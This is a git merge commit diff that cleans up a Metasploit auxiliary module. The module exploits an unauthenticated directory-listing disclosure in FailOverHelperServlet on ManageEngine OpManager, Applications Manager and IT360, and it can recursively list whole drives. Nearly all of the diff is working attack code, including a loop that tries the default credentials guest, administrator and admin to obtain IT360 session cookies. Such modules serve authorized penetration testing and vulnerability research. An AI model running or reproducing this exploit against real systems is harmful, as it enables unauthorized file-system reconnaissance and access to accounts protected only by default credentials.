Merge pull request #14 from jvazquez-r7/review_4659

Clean OpManager directory content disclosure module
2015-01-31 19:48:20 +00:00 · 2015-01-31 19:48:20 +00:00 · 50c518d763
parent a806cb401a c9ac56442d
commit 50c518d763
1 changed files with 78 additions and 83 deletions
--- a/modules/auxiliary/admin/http/manageengine_dir_listing.rb
+++ b/modules/auxiliary/admin/http/manageengine_dir_listing.rb
@ -12,21 +12,20 @@ class Metasploit3 < Msf::Auxiliary

  def initialize(info={})
    super(update_info(info,
-      'Name'           => "ManageEngine OpManager / Applications Manager / IT360 Arbitrary Directory Listing",
+      'Name'           => "ManageEngine Multiple Products Arbitrary Directory Listing",
      'Description'    => %q{
-          This module exploits a directory listing information disclosure vulnerability in
-          FailOverHelperServlet on ManageEngine OpManager, Applications Manager and IT360.
-          It recurses through diretories, so it will list the whole drive if you ask it to list
-          / in Linux or C:\ in Windows.
-          This vulnerability is unauthenticated on OpManager and Applications Manager, but
-          authenticated in IT360. This module will attempt to login using the default
-          credentials for the administrator and guest accounts; alternatively you can provide a
-          pre-authenticated cookie or a username / password combo.
-          For IT360 targets enter the RPORT of the OpManager instance (usually 8300).
-          This module has been tested on both Windows and Linux with several different versions
-          Windows paths have to be escaped with 4 backslashes on the command line.
-          There is a companion module that allows you to download an arbitrary file.
-          This vulnerability has been fixed in Applications Manager v11.9 b11912 and OpManager 11.6.          
+        This module exploits a directory listing information disclosure vulnerability in the
+        FailOverHelperServlet on ManageEngine OpManager, Applications Manager and IT360. It
+        makes a recursive listing, so it will list the whole drive if you ask it to list / in
+        Linux or C:\ in Windows. This vulnerability is unauthenticated on OpManager and
+        Applications Manager, but authenticated in IT360. This module will attempt to login
+        using the default credentials for the administrator and guest accounts; alternatively
+        you can provide a pre-authenticated cookie or a username / password combo. For IT360
+        targets enter the RPORT of the OpManager instance (usually 8300). This module has been
+        tested on both Windows and Linux with several different versions Windows paths have to
+        be escaped with 4 backslashes on the command line. There is a companion module that
+        allows you to download an arbitrary file. This vulnerability has been fixed in Applications
+        Manager v11.9 b11912 and OpManager 11.6.
      },
      'Author'         =>
        [
@ -40,56 +39,56 @@ class Metasploit3 < Msf::Auxiliary
          ['URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/ManageEngine/me_failservlet.txt'],
          ['URL', 'FULLDISC_URL']
        ],
-      'DefaultOptions' => { 'WfsDelay' => 30 },
      'DisclosureDate' => 'Jan 28 2015'))

    register_options(
      [
        Opt::RPORT(80),
-        OptString.new('TARGETURI',
-          [ true, "The base path to OpManager, AppManager or IT360", '/' ]),
-        OptString.new('DIRECTORY', [false, 'Path of the directory to list', '/etc/']),
-        OptString.new('IAMAGENTTICKET',
-          [false, 'Pre-authenticated IAMAGENTTICKET cookie (IT360 target only)']),
-        OptString.new('USERNAME',
-          [true, 'The username to login as (IT360 target only)', 'guest']),
-        OptString.new('PASSWORD',
-          [true, 'Password for the specified username (IT360 target only)', 'guest']),
-        OptString.new('DOMAIN_NAME',
-          [false, 'Name of the domain to logon to (IT360 target only)'])
+        OptString.new('TARGETURI', [true, "The base path to OpManager, AppManager or IT360", '/']),
+        OptString.new('DIRECTORY', [true, 'Path of the directory to list', '/etc/']),
+        OptString.new('IAMAGENTTICKET', [false, 'Pre-authenticated IAMAGENTTICKET cookie (IT360 target only)']),
+        OptString.new('USERNAME', [false, 'The username to login as (IT360 target only)']),
+        OptString.new('PASSWORD', [false, 'Password for the specified username (IT360 target only)']),
+        OptString.new('DOMAIN_NAME', [false, 'Name of the domain to logon to (IT360 target only)'])
      ], self.class)
  end


  def get_cookie
+    cookie = nil
    res = send_request_cgi({
      'method' => 'GET',
      'uri' => normalize_uri(datastore['TARGETURI'])
    })
+
    if res
-      return res.get_cookies
-    end
+      cookie = res.get_cookies
    end

+    cookie
+  end

  def detect_it360
    res = send_request_cgi({
-      'uri'    => "/",
+      'uri'    => '/',
      'method' => 'GET'
    })
+
    if res && res.get_cookies.to_s =~ /IAMAGENTTICKET([A-Z]{0,4})/
      return true
    end
+
    return false
  end

-
  def get_it360_cookie_name
    res = send_request_cgi({
      'method' => 'GET',
-      'uri' => normalize_uri("/"),
+      'uri' => normalize_uri('/')
    })
+
    cookie = res.get_cookies
+
    if cookie =~ /IAMAGENTTICKET([A-Z]{0,4})/
      return $1
    else
@ -97,28 +96,24 @@ class Metasploit3 < Msf::Auxiliary
    end
  end

-
-
  def authenticate_it360(port, path, username, password)
-    if datastore['DOMAIN_NAME'] == nil
+    if datastore['DOMAIN_NAME'].nil?
      vars_post = {
        'LOGIN_ID' => username,
        'PASSWORD' => password,
-          'isADEnabled' => "false"
+        'isADEnabled' => 'false'
      }
    else
      vars_post = {
        'LOGIN_ID' => username,
        'PASSWORD' => password,
-          'isADEnabled' => "true",
+        'isADEnabled' => 'true',
        'domainName' => datastore['DOMAIN_NAME']
      }
    end

-    op_port = datastore['RPORT']
-    datastore['RPORT'] = port
-
    res = send_request_cgi({
+      'rport' => port,
      'method' => 'POST',
      'uri' => normalize_uri(path),
      'vars_get' => {
@ -129,29 +124,27 @@ class Metasploit3 < Msf::Auxiliary
      'vars_post' => vars_post
    })

-    datastore['RPORT'] = op_port
-
    if res && res.get_cookies.to_s =~ /IAMAGENTTICKET([A-Z]{0,4})=([\w]{9,})/
      # /IAMAGENTTICKET([A-Z]{0,4})=([\w]{9,})/ -> this pattern is to avoid matching "removed"
      return res.get_cookies
-    else
-      return nil
    end
+
+    nil
  end


  def login_it360
    # Do we already have a valid cookie? If yes, just return that.
-    if datastore['IAMAGENTTICKET'] != nil
+    unless datastore['IAMAGENTTICKET'].nil?
      cookie_name = get_it360_cookie_name
-      cookie = "IAMAGENTTICKET" + cookie_name + "=" + datastore['IAMAGENTTICKET'] + ";"
+      cookie = 'IAMAGENTTICKET' + cookie_name + '=' + datastore['IAMAGENTTICKET'] + ';'
      return cookie
    end

    # get the correct path, host and port
    res = send_request_cgi({
      'method' => 'GET',
-      'uri' => normalize_uri("/"),
+      'uri' => normalize_uri('/')
    })

    if res && res.redirect?
@ -160,44 +153,46 @@ class Metasploit3 < Msf::Auxiliary
      return nil
    end

+    if datastore['USERNAME'] && datastore['PASSWORD']
+      print_status("#{peer} - Trying to authenticate as #{datastore['USERNAME']}/#{datastore['PASSWORD']}...")
      cookie = authenticate_it360(uri[0], uri[1], datastore['USERNAME'], datastore['PASSWORD'])
-    if cookie != nil
-      return cookie
-    elsif datastore['USERNAME'] == 'guest' && datastore['JSESSIONID'] == nil
-      # we've tried with the default guest password, now let's try with the default admin password
-      cookie = authenticate_it360(uri[0], uri[1], 'administrator', 'administrator')
-      if cookie != nil
-        return cookie
-      else
-        # Try one more time with the default admin login for some versions
-        cookie = authenticate_it360(uri[0], uri[1], 'admin', 'admin')
-        if cookie != nil
+      unless cookie.nil?
        return cookie
      end
    end
-    end
-    return nil
-  end

+    default_users = ['guest', 'administrator', 'admin']
+
+    default_users.each do |user|
+      print_status("#{peer} - Trying to authenticate as #{user}...")
+      cookie = authenticate_it360(uri[0], uri[1], user, user)
+      unless cookie.nil?
+        return cookie
+      end
+    end
+
+    nil
+  end

  def run
    # No point to continue if directory is not specified
-    if datastore['DIRECTORY'].nil? || datastore['DIRECTORY'].empty?
-      print_error("Please supply the path of the directory you want to list.")
+    if datastore['DIRECTORY'].empty?
+      print_error('Please supply the path of the directory you want to list.')
      return
    end

    if detect_it360
      print_status("#{peer} - Detected IT360, attempting to login...")
      cookie = login_it360
-      if cookie == nil
-        print_error("#{peer} - Failed to login to IT360!")
-        return
-      end
    else
      cookie = get_cookie
    end

+    if cookie.nil?
+      print_error("#{peer} - Failed to get application cookies!")
+      return
+    end
+
    servlet = 'com.adventnet.me.opmanager.servlet.FailOverHelperServlet'
    res = send_request_cgi({
      'method' => 'GET',
@ -218,7 +213,7 @@ class Metasploit3 < Msf::Auxiliary
        'vars_get' => {
          'operation' => 'listdirectory',
          'rootDirectory' => datastore['DIRECTORY']
-        },
+        }
      })
    rescue Rex::ConnectionRefused
      print_error("#{peer} - Could not connect.")
@ -226,7 +221,7 @@ class Metasploit3 < Msf::Auxiliary
    end

    # Show data if needed
-    if res && res.code == 200
+    if res && res.code == 200 && res.body
      vprint_line(res.body.to_s)
      fname = File.basename(datastore['DIRECTORY'])

@ -234,7 +229,7 @@ class Metasploit3 < Msf::Auxiliary
        'manageengine.http',
        'text/plain',
        datastore['RHOST'],
-        res.body,
+        res.body.to_s,
        fname
      )
      print_good("File with directory listing saved in: #{path}")